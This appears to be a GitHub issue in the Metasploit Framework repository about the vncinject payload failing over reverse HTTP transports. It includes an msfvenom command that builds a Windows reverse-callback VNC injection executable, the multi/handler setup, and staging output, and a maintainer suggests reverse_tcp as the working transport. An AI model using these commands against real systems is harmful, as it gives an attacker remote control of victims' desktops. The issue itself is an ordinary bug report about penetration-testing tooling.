search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.04k stars 13.94k forks source link

vncinject does not work with reverse_*http* #9720

Open eddieharari opened 6 years ago

eddieharari commented 6 years ago

Steps to reproduce

  1. msfvenom -p windows/x64/vncinject/reverse_winhttp -f exe lhost=192.168.2.115 > /mnt/vnchttp64.exe

  2. msfconsole use exploit/multi/handler set payload windows/x64/vncinject/reverse_http set lhost "IP OF METASPLOIT machine"

  3. Running the vnchttp.exe on windows 2012 machine with connectivity to the metaploit machine

Here are the results:

msf exploit(handler) > [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Staging x64 payload (475136 bytes) ... [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Starting local TCP relay on 127.0.0.1:5900... [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Local TCP relay started. [] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Launched vncviewer. [*] VNC connection closed. /usr/bin/vncviewer: VNC server closed connection

What should happen? VNC session should be open.

What happens instead? VNC session allways break cause of server error.

Metasploit version

Framework: 4.16.2-dev Console : 4.16.2-dev

I installed Metasploit with:

busterb commented 6 years ago

VNC doesn't support HTTP as a transport. Try using reverse_tcp instead. Just checked, it works fine using Tiger VNC as the vncviewer application.

busterb commented 6 years ago

Noted above, it seems like around 2015 the code that prevents this payload combination from appearing in the list stopped blocking it. Still trying to work out what's wrong :/

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.